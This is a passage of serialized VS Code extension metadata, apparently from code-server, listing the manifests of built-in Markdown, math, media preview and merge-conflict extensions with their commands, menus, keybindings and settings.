Languages"],"contributes":{"languages":[{"id":"markdown","aliases":["Markdown","markdown"],"extensions":[".md",".mkd",".mdwn",".mdown",".markdown",".markdn",".mdtxt",".mdtext",".workbook"],"filenamePatterns":["**/.cursor/**/*.mdc"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"markdown","scopeName":"text.html.markdown","path":"./syntaxes/markdown.tmLanguage.json","embeddedLanguages":{"meta.embedded.block.html":"html","source.js":"javascript","source.css":"css","meta.embedded.block.frontmatter":"yaml","meta.embedded.block.css":"css","meta.embedded.block.ini":"ini","meta.embedded.block.java":"java","meta.embedded.block.lua":"lua","meta.embedded.block.makefile":"makefile","meta.embedded.block.perl":"perl","meta.embedded.block.r":"r","meta.embedded.block.ruby":"ruby","meta.embedded.block.php":"php","meta.embedded.block.sql":"sql","meta.embedded.block.vs_net":"vs_net","meta.embedded.block.xml":"xml","meta.embedded.block.xsl":"xsl","meta.embedded.block.yaml":"yaml","meta.embedded.block.dosbatch":"dosbatch","meta.embedded.block.clojure":"clojure","meta.embedded.block.coffee":"coffee","meta.embedded.block.c":"c","meta.embedded.block.cpp":"cpp","meta.embedded.block.diff":"diff","meta.embedded.block.dockerfile":"dockerfile","meta.embedded.block.go":"go","meta.embedded.block.groovy":"groovy","meta.embedded.block.pug":"jade","meta.embedded.block.ignore":"ignore","meta.embedded.block.javascript":"javascript","meta.embedded.block.json":"json","meta.embedded.block.jsonc":"jsonc","meta.embedded.block.jsonl":"jsonl","meta.embedded.block.latex":"latex","meta.embedded.block.less":"less","meta.embedded.block.objc":"objc","meta.embedded.block.scss":"scss","meta.embedded.block.perl6":"perl6","meta.embedded.block.powershell":"powershell","meta.embedded.block.python":"python","meta.embedded.block.restructuredtext":"restructuredtext","meta.embedded.block.rust":"rust","meta.embedded.block.scala":"scala","meta.embedded.block.shellscript":"shellscript","meta.embedded.block.typescript":"typescript","meta.embedded.block.typescriptreact":"typescriptreact","meta.embedded.block.csharp":"csharp","meta.embedded.block.fsharp":"fsharp"},"unbalancedBracketScopes":["markup.underline.link.markdown","punctuation.definition.list.begin.markdown"]}],"snippets":[{"language":"markdown","path":"./snippets/markdown.code-snippets"}],"configurationDefaults":{"[markdown]":{"editor.unicodeHighlight.ambiguousCharacters":false,"editor.unicodeHighlight.invisibleCharacters":false,"diffEditor.ignoreTrimWhitespace":false}}},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin microsoft/vscode-markdown-tm-grammar syntaxes/markdown.tmLanguage ./syntaxes/markdown.tmLanguage.json"},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/markdown-basics","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.markdown-language-features"},"manifest":{"name":"markdown-language-features","displayName":"Markdown Language Features","description":"Provides rich language support for Markdown.","version":"1.0.0","icon":"icon.png","publisher":"vscode","license":"MIT","aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","engines":{"vscode":"^1.70.0"},"main":"./dist/extension","browser":"./dist/browser/extension","categories":["Programming Languages"],"activationEvents":["onLanguage:markdown","onLanguage:prompt","onLanguage:instructions","onLanguage:chatagent","onCommand:markdown.api.render","onCommand:markdown.api.reloadPlugins","onWebviewPanel:markdown.preview"],"capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":"limited","description":"Required for loading styles configured in the workspace.","restrictedConfigurations":["markdown.styles"]}},"contributes":{"notebookRenderer":[{"id":"vscode.markdown-it-renderer","displayName":"Markdown it renderer","entrypoint":"./notebook-out/index.js","mimeTypes":["text/markdown","text/latex","text/x-css","text/x-html","text/x-json","text/x-typescript","text/x-abap","text/x-apex","text/x-azcli","text/x-bat","text/x-cameligo","text/x-clojure","text/x-coffee","text/x-cpp","text/x-csharp","text/x-csp","text/x-css","text/x-dart","text/x-dockerfile","text/x-ecl","text/x-fsharp","text/x-go","text/x-graphql","text/x-handlebars","text/x-hcl","text/x-html","text/x-ini","text/x-java","text/x-javascript","text/x-julia","text/x-kotlin","text/x-less","text/x-lexon","text/x-lua","text/x-m3","text/x-markdown","text/x-mips","text/x-msdax","text/x-mysql","text/x-objective-c/objective","text/x-pascal","text/x-pascaligo","text/x-perl","text/x-pgsql","text/x-php","text/x-postiats","text/x-powerquery","text/x-powershell","text/x-pug","text/x-python","text/x-r","text/x-razor","text/x-redis","text/x-redshift","text/x-restructuredtext","text/x-ruby","text/x-rust","text/x-sb","text/x-scala","text/x-scheme","text/x-scss","text/x-shell","text/x-solidity","text/x-sophia","text/x-sql","text/x-st","text/x-swift","text/x-systemverilog","text/x-tcl","text/x-twig","text/x-typescript","text/x-vb","text/x-xml","text/x-yaml","application/json"]}],"commands":[{"command":"_markdown.copyImage","title":"Copy Image","category":"Markdown"},{"command":"_markdown.openImage","title":"Open Image","category":"Markdown"},{"command":"markdown.showPreview","title":"Open Preview","category":"Markdown","icon":{"light":"./media/preview-light.svg","dark":"./media/preview-dark.svg"}},{"command":"markdown.showPreviewToSide","title":"Open Preview to the Side","category":"Markdown","icon":"$(open-preview)"},{"command":"markdown.showLockedPreviewToSide","title":"Open Locked Preview to the Side","category":"Markdown","icon":"$(open-preview)"},{"command":"markdown.showSource","title":"Show Source","category":"Markdown","icon":"$(go-to-file)"},{"command":"markdown.showPreviewSecuritySelector","title":"Change Preview Security Settings","category":"Markdown"},{"command":"markdown.preview.refresh","title":"Refresh Preview","category":"Markdown"},{"command":"markdown.preview.toggleLock","title":"Toggle Preview Locking","category":"Markdown"},{"command":"markdown.findAllFileReferences","title":"Find File References","category":"Markdown"},{"command":"markdown.editor.insertLinkFromWorkspace","title":"Insert Link to File in Workspace","category":"Markdown","enablement":"editorLangId =~ /^(markdown|prompt|instructions|chatagent)$/ && !activeEditorIsReadonly"},{"command":"markdown.editor.insertImageFromWorkspace","title":"Insert Image from Workspace","category":"Markdown","enablement":"editorLangId =~ /^(markdown|prompt|instructions|chatagent)$/ && !activeEditorIsReadonly"}],"menus":{"webview/context":[{"command":"_markdown.copyImage","when":"webviewId == 'markdown.preview' && (webviewSection == 'image' || webviewSection == 'localImage')"},{"command":"_markdown.openImage","when":"webviewId == 'markdown.preview' && webviewSection == 'localImage'"}],"editor/title":[{"command":"markdown.showPreviewToSide","when":"editorLangId =~ /^(markdown|prompt|instructions|chatagent)$/ && !notebookEditorFocused && !hasCustomMarkdownPreview","alt":"markdown.showPreview","group":"navigation"},{"command":"markdown.showSource","when":"activeWebviewPanelId == 'markdown.preview' || activeCustomEditorId == 'vscode.markdown.preview.editor'","group":"navigation"},{"command":"markdown.preview.refresh","when":"activeWebviewPanelId == 'markdown.preview' || activeCustomEditorId == 'vscode.markdown.preview.editor'","group":"1_markdown"},{"command":"markdown.preview.toggleLock","when":"activeWebviewPanelId == 'markdown.preview' || activeCustomEditorId == 'vscode.markdown.preview.editor'","group":"1_markdown"},{"command":"markdown.showPreviewSecuritySelector","when":"activeWebviewPanelId == 'markdown.preview' || activeCustomEditorId == 'vscode.markdown.preview.editor'","group":"1_markdown"}],"explorer/context":[{"command":"markdown.showPreview","when":"resourceLangId =~ /^(markdown|prompt|instructions|chatagent)$/ && !hasCustomMarkdownPreview","group":"navigation"},{"command":"markdown.findAllFileReferences","when":"resourceLangId =~ /^(markdown|prompt|instructions|chatagent)$/","group":"4_search"}],"editor/title/context":[{"command":"markdown.showPreview","when":"resourceLangId =~ /^(markdown|prompt|instructions|chatagent)$/ && !hasCustomMarkdownPreview","group":"1_open"},{"command":"markdown.findAllFileReferences","when":"resourceLangId =~ /^(markdown|prompt|instructions|chatagent)$/"}],"commandPalette":[{"command":"_markdown.openImage","when":"false"},{"command":"_markdown.copyImage","when":"false"},{"command":"markdown.showPreview","when":"editorLangId =~ /^(markdown|prompt|instructions|chatagent)$/ && !notebookEditorFocused","group":"navigation"},{"command":"markdown.showPreviewToSide","when":"editorLangId =~ /^(markdown|prompt|instructions|chatagent)$/ && !notebookEditorFocused","group":"navigation"},{"command":"markdown.showLockedPreviewToSide","when":"editorLangId =~ /^(markdown|prompt|instructions|chatagent)$/ && !notebookEditorFocused","group":"navigation"},{"command":"markdown.showSource","when":"activeWebviewPanelId == 'markdown.preview' || activeCustomEditorId == 'vscode.markdown.preview.editor'","group":"navigation"},{"command":"markdown.showPreviewSecuritySelector","when":"editorLangId =~ /^(markdown|prompt|instructions|chatagent)$/ && !notebookEditorFocused"},{"command":"markdown.showPreviewSecuritySelector","when":"activeWebviewPanelId == 'markdown.preview' || activeCustomEditorId == 'vscode.markdown.preview.editor'"},{"command":"markdown.preview.toggleLock","when":"activeWebviewPanelId == 'markdown.preview' || activeCustomEditorId == 'vscode.markdown.preview.editor'"},{"command":"markdown.preview.refresh","when":"editorLangId =~ /^(markdown|prompt|instructions|chatagent)$/ && !notebookEditorFocused"},{"command":"markdown.preview.refresh","when":"activeWebviewPanelId == 'markdown.preview' || activeCustomEditorId == 'vscode.markdown.preview.editor'"},{"command":"markdown.findAllFileReferences","when":"editorLangId =~ /^(markdown|prompt|instructions|chatagent)$/"}]},"keybindings":[{"command":"markdown.showPreview","key":"shift+ctrl+v","mac":"shift+cmd+v","when":"editorLangId =~ /^(markdown|prompt|instructions|chatagent)$/ && !notebookEditorFocused"},{"command":"markdown.showPreviewToSide","key":"ctrl+k v","mac":"cmd+k v","when":"editorLangId =~ /^(markdown|prompt|instructions|chatagent)$/ && !notebookEditorFocused"}],"configuration":{"type":"object","title":"Markdown","order":20,"properties":{"markdown.styles":{"type":"array","items":{"type":"string"},"default":[],"description":"A list of URLs or local paths to CSS style sheets to use from the Markdown preview. Relative paths are interpreted relative to the folder open in the Explorer. If there is no open folder, they are interpreted relative to the location of the Markdown file. All '\\' need to be written as '\\\\'.","scope":"resource"},"markdown.preview.breaks":{"type":"boolean","default":false,"markdownDescription":"Sets how line-breaks are rendered in the Markdown preview. Setting it to `true` creates a `
` for newlines inside paragraphs.","scope":"resource"},"markdown.preview.linkify":{"type":"boolean","default":true,"description":"Convert URL-like text to links in the Markdown preview.","scope":"resource"},"markdown.preview.typographer":{"type":"boolean","default":false,"description":"Enable some language-neutral replacement and quotes beautification in the Markdown preview.","scope":"resource"},"markdown.preview.fontFamily":{"type":"string","default":"-apple-system, BlinkMacSystemFont, 'Segoe WPC', 'Segoe UI', system-ui, 'Ubuntu', 'Droid Sans', sans-serif","description":"Controls the font family used in the Markdown preview.","scope":"resource"},"markdown.preview.fontSize":{"type":"number","default":14,"description":"Controls the font size in pixels used in the Markdown preview.","scope":"resource"},"markdown.preview.lineHeight":{"type":"number","default":1.6,"description":"Controls the line height used in the Markdown preview. This number is relative to the font size.","scope":"resource"},"markdown.preview.scrollPreviewWithEditor":{"type":"boolean","default":true,"description":"When a Markdown editor is scrolled, update the view of the preview.","scope":"resource"},"markdown.preview.markEditorSelection":{"type":"boolean","default":true,"description":"Mark the current editor selection in the Markdown preview.","scope":"resource"},"markdown.preview.scrollEditorWithPreview":{"type":"boolean","default":true,"description":"When a Markdown preview is scrolled, update the view of the editor.","scope":"resource"},"markdown.preview.doubleClickToSwitchToEditor":{"type":"boolean","default":true,"description":"Double-click in the Markdown preview to switch to the editor.","scope":"resource"},"markdown.preview.openMarkdownLinks":{"type":"string","default":"inPreview","description":"Controls how links to other Markdown files in the Markdown preview should be opened.","scope":"resource","enum":["inPreview","inEditor"],"enumDescriptions":["Try to open links in the Markdown preview.","Try to open links in the editor."]},"markdown.links.openLocation":{"type":"string","default":"currentGroup","description":"Controls where links in Markdown files should be opened.","scope":"resource","enum":["currentGroup","beside"],"enumDescriptions":["Open links in the active editor group.","Open links beside the active editor."]},"markdown.suggest.paths.enabled":{"type":"boolean","default":true,"description":"Enable path suggestions while writing links in Markdown files.","scope":"resource"},"markdown.suggest.paths.includeWorkspaceHeaderCompletions":{"type":"string","default":"onDoubleHash","scope":"resource","markdownDescription":"Enable suggestions for headers in other Markdown files in the current workspace. Accepting one of these suggestions inserts the full path to header in that file, for example: `[link text](/path/to/file.md#header)`.","enum":["never","onDoubleHash","onSingleOrDoubleHash"],"markdownEnumDescriptions":["Disable workspace header suggestions.","Enable workspace header suggestions after typing `##` in a path, for example: `[link text](##`.","Enable workspace header suggestions after typing either `##` or `#` in a path, for example: `[link text](#` or `[link text](##`."]},"markdown.trace.server":{"type":"string","scope":"window","enum":["off","messages","verbose"],"default":"off","description":"Traces the communication between VS Code and the Markdown language server."},"markdown.server.log":{"type":"string","scope":"window","enum":["off","debug","trace"],"default":"off","description":"Controls the logging level of the Markdown language server."},"markdown.editor.drop.enabled":{"type":"string","scope":"resource","markdownDescription":"Enable dropping files into a Markdown editor while holding Shift. Requires enabling `#editor.dropIntoEditor.enabled#`.","default":"smart","enum":["always","smart","never"],"markdownEnumDescriptions":["Always insert Markdown links.","Smartly create Markdown links by default when not dropping into a code block or other special element. Use the drop widget to switch between pasting as plain text or as Markdown links.","Never create Markdown links."]},"markdown.editor.drop.copyIntoWorkspace":{"type":"string","markdownDescription":"Controls if files outside of the workspace that are dropped into a Markdown editor should be copied into the workspace.\n\nUse `#markdown.copyFiles.destination#` to configure where copied dropped files should be created","default":"mediaFiles","enum":["mediaFiles","never"],"markdownEnumDescriptions":["Try to copy external image and video files into the workspace.","Do not copy external files into the workspace."]},"markdown.editor.filePaste.enabled":{"type":"string","scope":"resource","markdownDescription":"Enable pasting files into a Markdown editor to create Markdown links. Requires enabling `#editor.pasteAs.enabled#`.","default":"smart","enum":["always","smart","never"],"markdownEnumDescriptions":["Always insert Markdown links.","Smartly create Markdown links by default when not pasting into a code block or other special element. Use the paste widget to switch between pasting as plain text or as Markdown links.","Never create Markdown links."]},"markdown.editor.filePaste.copyIntoWorkspace":{"type":"string","markdownDescription":"Controls if files outside of the workspace that are pasted into a Markdown editor should be copied into the workspace.\n\nUse `#markdown.copyFiles.destination#` to configure where copied files should be created.","default":"mediaFiles","enum":["mediaFiles","never"],"markdownEnumDescriptions":["Try to copy external image and video files into the workspace.","Do not copy external files into the workspace."]},"markdown.editor.filePaste.videoSnippet":{"type":"string","markdownDescription":"Snippet used when adding videos to Markdown. This snippet can use the following variables:\n- `${src}` — The resolved path of the video file.\n- `${title}` — The title used for the video. A snippet placeholder will automatically be created for this variable.","default":""},"markdown.editor.filePaste.audioSnippet":{"type":"string","markdownDescription":"Snippet used when adding audio to Markdown. This snippet can use the following variables:\n- `${src}` — The resolved path of the audio file.\n- `${title}` — The title used for the audio. A snippet placeholder will automatically be created for this variable.","default":""},"markdown.editor.pasteUrlAsFormattedLink.enabled":{"type":"string","scope":"resource","markdownDescription":"Controls if Markdown links are created when URLs are pasted into a Markdown editor. Requires enabling `#editor.pasteAs.enabled#`.","default":"smartWithSelection","enum":["always","smart","smartWithSelection","never"],"markdownEnumDescriptions":["Always insert Markdown links.","Smartly create Markdown links by default when not pasting into a code block or other special element. Use the paste widget to switch between pasting as plain text or as Markdown links.","Smartly create Markdown links by default when you have selected text and are not pasting into a code block or other special element. Use the paste widget to switch between pasting as plain text or as Markdown links.","Never create Markdown links."]},"markdown.validate.enabled":{"type":"boolean","scope":"resource","description":"Enable all error reporting in Markdown files.","default":false},"markdown.validate.referenceLinks.enabled":{"type":"string","scope":"resource","markdownDescription":"Validate reference links in Markdown files, for example: `[link][ref]`. Requires enabling `#markdown.validate.enabled#`.","default":"warning","enum":["ignore","warning","error"]},"markdown.validate.fragmentLinks.enabled":{"type":"string","scope":"resource","markdownDescription":"Validate fragment links to headers in the current Markdown file, for example: `[link](#header)`. Requires enabling `#markdown.validate.enabled#`.","default":"warning","enum":["ignore","warning","error"]},"markdown.validate.fileLinks.enabled":{"type":"string","scope":"resource","markdownDescription":"Validate links to other files in Markdown files, for example `[link](/path/to/file.md)`. This checks that the target files exists. Requires enabling `#markdown.validate.enabled#`.","default":"warning","enum":["ignore","warning","error"]},"markdown.validate.fileLinks.markdownFragmentLinks":{"type":"string","scope":"resource","markdownDescription":"Validate the fragment part of links to headers in other files in Markdown files, for example: `[link](/path/to/file.md#header)`. Inherits the setting value from `#markdown.validate.fragmentLinks.enabled#` by default.","default":"inherit","enum":["inherit","ignore","warning","error"]},"markdown.validate.ignoredLinks":{"type":"array","scope":"resource","markdownDescription":"Configure links that should not be validated. For example adding `/about` would not validate the link `[about](/about)`, while the glob `/assets/**/*.svg` would let you skip validation for any link to `.svg` files under the `assets` directory.","items":{"type":"string"}},"markdown.validate.unusedLinkDefinitions.enabled":{"type":"string","scope":"resource","markdownDescription":"Validate link definitions that are unused in the current file.","default":"hint","enum":["ignore","hint","warning","error"]},"markdown.validate.duplicateLinkDefinitions.enabled":{"type":"string","scope":"resource","markdownDescription":"Validate duplicated definitions in the current file.","default":"warning","enum":["ignore","warning","error"]},"markdown.updateLinksOnFileMove.enabled":{"type":"string","enum":["prompt","always","never"],"markdownEnumDescriptions":["Prompt on each file move.","Always update links automatically.","Never try to update link and don't prompt."],"default":"never","markdownDescription":"Try to update links in Markdown files when a file is renamed/moved in the workspace. Use `#markdown.updateLinksOnFileMove.include#` to configure which files trigger link updates.","scope":"window"},"markdown.updateLinksOnFileMove.include":{"type":"array","markdownDescription":"Glob patterns that specifies files that trigger automatic link updates. See `#markdown.updateLinksOnFileMove.enabled#` for details about this feature.","scope":"window","items":{"type":"string","description":"The glob pattern to match file paths against. Set to true to enable the pattern."},"default":["**/*.{md,mkd,mdwn,mdown,markdown,markdn,mdtxt,mdtext,workbook}","**/*.{jpg,jpe,jpeg,png,bmp,gif,ico,webp,avif,tiff,svg,mp4}"]},"markdown.updateLinksOnFileMove.enableForDirectories":{"type":"boolean","default":true,"description":"Enable updating links when a directory is moved or renamed in the workspace.","scope":"window"},"markdown.occurrencesHighlight.enabled":{"type":"boolean","default":false,"description":"Enable highlighting link occurrences in the current document.","scope":"resource"},"markdown.copyFiles.destination":{"type":"object","markdownDescription":"Configures the path and file name of files created by copy/paste or drag and drop. This is a map of globs that match against a Markdown document path to the destination path where the new file should be created.\n\nThe destination path may use the following variables:\n\n- `${documentDirName}` — Absolute parent directory path of the Markdown document, e.g. `/Users/me/myProject/docs`.\n- `${documentRelativeDirName}` — Relative parent directory path of the Markdown document, e.g. `docs`. This is the same as `${documentDirName}` if the file is not part of a workspace.\n- `${documentFileName}` — The full filename of the Markdown document, e.g. `README.md`.\n- `${documentBaseName}` — The basename of the Markdown document, e.g. `README`.\n- `${documentExtName}` — The extension of the Markdown document, e.g. `md`.\n- `${documentFilePath}` — Absolute path of the Markdown document, e.g. `/Users/me/myProject/docs/README.md`.\n- `${documentRelativeFilePath}` — Relative path of the Markdown document, e.g. `docs/README.md`. This is the same as `${documentFilePath}` if the file is not part of a workspace.\n- `${documentWorkspaceFolder}` — The workspace folder for the Markdown document, e.g. `/Users/me/myProject`. This is the same as `${documentDirName}` if the file is not part of a workspace.\n- `${fileName}` — The file name of the dropped file, e.g. `image.png`.\n- `${fileExtName}` — The extension of the dropped file, e.g. `png`.\n- `${unixTime}` — The current Unix timestamp in milliseconds.\n- `${isoTime}` — The current time in ISO 8601 format, e.g. '2025-06-06T08:40:32.123Z'.","additionalProperties":{"type":"string"}},"markdown.copyFiles.overwriteBehavior":{"type":"string","markdownDescription":"Controls if files created by drop or paste should overwrite existing files.","default":"nameIncrementally","enum":["nameIncrementally","overwrite"],"markdownEnumDescriptions":["If a file with the same name already exists, append a number to the file name, for example: `image.png` becomes `image-1.png`.","If a file with the same name already exists, overwrite it."]},"markdown.preferredMdPathExtensionStyle":{"type":"string","default":"auto","markdownDescription":"Controls if file extensions (for example `.md`) are added or not for links to Markdown files. This setting is used when file paths are added by tooling such as path completions or file renames.","enum":["auto","includeExtension","removeExtension"],"markdownEnumDescriptions":["For existing paths, try to maintain the file extension style. For new paths, add file extensions.","Prefer including the file extension. For example, path completions to a file named `file.md` will insert `file.md`.","Prefer removing the file extension. For example, path completions to a file named `file.md` will insert `file` without the `.md`."]},"markdown.editor.updateLinksOnPaste.enabled":{"type":"boolean","markdownDescription":"Enable/disable a paste option that updates links and reference in text that is copied and pasted between Markdown editors.\n\nTo use this feature, after pasting text that contains updatable links, just click on the Paste Widget and select `Paste and update pasted links`.","scope":"resource","default":true}}},"configurationDefaults":{"[markdown]":{"editor.wordWrap":"on","editor.quickSuggestions":{"comments":"off","strings":"off","other":"off"}}},"jsonValidation":[{"fileMatch":"package.json","url":"./schemas/package.schema.json"}],"markdown.previewStyles":["./media/markdown.css","./media/highlight.css"],"markdown.previewScripts":["./media/index.js"],"customEditors":[{"viewType":"vscode.markdown.preview.editor","displayName":"Markdown Preview","priority":"option","selector":[{"filenamePattern":"*.md"}]}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/markdown-language-features","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.markdown-math"},"manifest":{"name":"markdown-math","displayName":"Markdown Math","description":"Adds math support to Markdown in notebooks.","version":"1.0.0","icon":"icon.png","publisher":"vscode","license":"MIT","aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","engines":{"vscode":"^1.54.0"},"categories":["Other","Programming Languages"],"capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"main":"./dist/extension","browser":"./dist/browser/extension","activationEvents":[],"contributes":{"languages":[{"id":"markdown-math","aliases":[]}],"grammars":[{"language":"markdown-math","scopeName":"text.html.markdown.math","path":"./syntaxes/md-math.tmLanguage.json"},{"scopeName":"markdown.math.block","path":"./syntaxes/md-math-block.tmLanguage.json","injectTo":["text.html.markdown"],"embeddedLanguages":{"meta.embedded.math.markdown":"latex"}},{"scopeName":"markdown.math.inline","path":"./syntaxes/md-math-inline.tmLanguage.json","injectTo":["text.html.markdown"],"embeddedLanguages":{"meta.embedded.math.markdown":"latex","punctuation.definition.math.end.markdown":"latex"}},{"scopeName":"markdown.math.codeblock","path":"./syntaxes/md-math-fence.tmLanguage.json","injectTo":["text.html.markdown"],"embeddedLanguages":{"meta.embedded.math.markdown":"latex"}}],"notebookRenderer":[{"id":"vscode.markdown-it-katex-extension","displayName":"Markdown it KaTeX renderer","entrypoint":{"extends":"vscode.markdown-it-renderer","path":"./notebook-out/katex.js"}}],"markdown.markdownItPlugins":true,"markdown.previewStyles":["./notebook-out/katex.min.css","./preview-styles/index.css"],"configuration":[{"title":"Markdown Math","properties":{"markdown.math.enabled":{"type":"boolean","default":true,"description":"Enable/disable rendering math in the built-in Markdown preview."},"markdown.math.macros":{"type":"object","additionalProperties":{"type":"string"},"default":{},"description":"A collection of custom macros. Each macro is a key-value pair where the key is a new command name and the value is the expansion of the macro.","scope":"resource"}}}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/markdown-math","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.media-preview"},"manifest":{"name":"media-preview","displayName":"Media Preview","description":"Provides VS Code's built-in previews for images, audio, and video","extensionKind":["ui","workspace"],"version":"1.0.0","publisher":"vscode","icon":"icon.png","license":"MIT","aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","engines":{"vscode":"^1.70.0"},"main":"./dist/extension","browser":"./dist/browser/extension.js","categories":["Other"],"activationEvents":[],"capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"contributes":{"configuration":{"type":"object","title":"Media Previewer","properties":{"mediaPreview.video.autoPlay":{"type":"boolean","default":false,"markdownDescription":"Start playing videos on mute automatically."},"mediaPreview.video.loop":{"type":"boolean","default":false,"markdownDescription":"Loop videos over again automatically."}}},"customEditors":[{"viewType":"imagePreview.previewEditor","displayName":"Image Preview","priority":"builtin","selector":[{"filenamePattern":"*.{jpg,jpe,jpeg,png,bmp,gif,ico,webp,avif,svg}"}]},{"viewType":"vscode.audioPreview","displayName":"Audio Preview","priority":"builtin","selector":[{"filenamePattern":"*.{mp3,wav,ogg,oga}"}]},{"viewType":"vscode.videoPreview","displayName":"Video Preview","priority":"builtin","selector":[{"filenamePattern":"*.{mp4,webm}"}]}],"commands":[{"command":"imagePreview.zoomIn","title":"Zoom in","category":"Image Preview"},{"command":"imagePreview.zoomOut","title":"Zoom out","category":"Image Preview"},{"command":"imagePreview.copyImage","title":"Copy","category":"Image Preview"},{"command":"imagePreview.reopenAsPreview","title":"Reopen as image preview","category":"Image Preview","icon":"$(preview)"},{"command":"imagePreview.reopenAsText","title":"Reopen as source text","category":"Image Preview","icon":"$(go-to-file)"}],"menus":{"commandPalette":[{"command":"imagePreview.zoomIn","when":"activeCustomEditorId == 'imagePreview.previewEditor'","group":"1_imagePreview"},{"command":"imagePreview.zoomOut","when":"activeCustomEditorId == 'imagePreview.previewEditor'","group":"1_imagePreview"},{"command":"imagePreview.copyImage","when":"false"},{"command":"imagePreview.reopenAsPreview","when":"activeEditor == workbench.editors.files.textFileEditor && resourceExtname == '.svg'","group":"navigation"},{"command":"imagePreview.reopenAsText","when":"activeCustomEditorId == 'imagePreview.previewEditor' && resourceExtname == '.svg'","group":"navigation"}],"webview/context":[{"command":"imagePreview.copyImage","when":"webviewId == 'imagePreview.previewEditor'"}],"editor/title":[{"command":"imagePreview.reopenAsPreview","when":"editorFocus && resourceExtname == '.svg'","group":"navigation"},{"command":"imagePreview.reopenAsText","when":"activeCustomEditorId == 'imagePreview.previewEditor' && resourceExtname == '.svg'","group":"navigation"}]}},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/media-preview","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.merge-conflict"},"manifest":{"name":"merge-conflict","publisher":"vscode","displayName":"Merge Conflict","description":"Highlighting and commands for inline merge conflicts.","icon":"media/icon.png","version":"1.0.0","license":"MIT","aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","engines":{"vscode":"^1.5.0"},"categories":["Other"],"capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"activationEvents":["onStartupFinished"],"main":"./dist/mergeConflictMain","browser":"./dist/browser/mergeConflictMain","contributes":{"commands":[{"category":"Merge Conflict","title":"Accept All Current","original":"Accept All Current","command":"merge-conflict.accept.all-current","enablement":"!isMergeEditor"},{"category":"Merge Conflict","title":"Accept All Incoming","original":"Accept All Incoming","command":"merge-conflict.accept.all-incoming","enablement":"!isMergeEditor"},{"category":"Merge Conflict","title":"Accept All Both","original":"Accept All Both","command":"merge-conflict.accept.all-both","enablement":"!isMergeEditor"},{"category":"Merge Conflict","title":"Accept Current","original":"Accept Current","command":"merge-conflict.accept.current","enablement":"!isMergeEditor"},{"category":"Merge Conflict","title":"Accept Incoming","original":"Accept Incoming","command":"merge-conflict.accept.incoming","enablement":"!isMergeEditor"},{"category":"Merge Conflict","title":"Accept Selection","original":"Accept Selection","command":"merge-conflict.accept.selection","enablement":"!isMergeEditor"},{"category":"Merge Conflict","title":"Accept Both","original":"Accept Both","command":"merge-conflict.accept.both","enablement":"!isMergeEditor"},{"category":"Merge Conflict","title":"Next Conflict","original":"Next Conflict","command":"merge-conflict.next","enablement":"!isMergeEditor","icon":"$(arrow-down)"},{"category":"Merge Conflict","title":"Previous Conflict","original":"Previous Conflict","command":"merge-conflict.previous","enablement":"!isMergeEditor","icon":"$(arrow-up)"},{"category":"Merge Conflict","title":"Compare Current Conflict","original":"Compare Current Conflict","command":"merge-conflict.compare","enablement":"!isMergeEditor"}],"menus":{"scm/resourceState/context":[{"command":"merge-conflict.accept.all-current","when":"scmProvider == git && scmResourceGroup == merge","group":"1_modification"},{"command":"merge-conflict.accept.all-incoming","when":"scmProvider == git && scmResourceGroup == merge","group":"1_modification"}],"editor/title":[{"command":"merge-conflict.previous","group":"navigation@1","when":"!isMergeEditor && mergeConflictsCount && mergeConflictsCount != 0"},{"command":"merge-conflict.next","group":"navigation@2","when":"!isMergeEditor && mergeConflictsCount && mergeConflictsCount != 0"}]},"configuration":{"title":"Merge Conflict","properties":{"merge-conflict.codeLens.enabled":{"type":"boolean","description":"Create a CodeLens for merge conflict blocks within editor.","default":true},"merge-conflict.decorators.enabled":{"type":"boolean","description":"Create decorators for merge conflict blocks within editor.","default":true},"merge-conflict.autoNavigateNextConflict.enabled":{"type":"boolean","description":"Whether to automatically navigate to the next merge conflict after resolving a merge conflict.","default":false},"merge-conflict.diffViewPosition":{"type":"string","enum":["Current","Beside","Below"],"description":"Controls where the diff view should be opened when comparing changes in merge conflicts.","enumDescriptions":["Open the diff view in the current editor group.","Open the diff view next to the current editor group.","Open the diff view below the current editor group."],"default":"Current"}}}},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/merge-conflict","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.mermaid-chat-features"},"manifest":{"name":"mermaid-chat-features","displayName":"Mermaid Chat Features","description":"Adds Mermaid diagram support to built-in 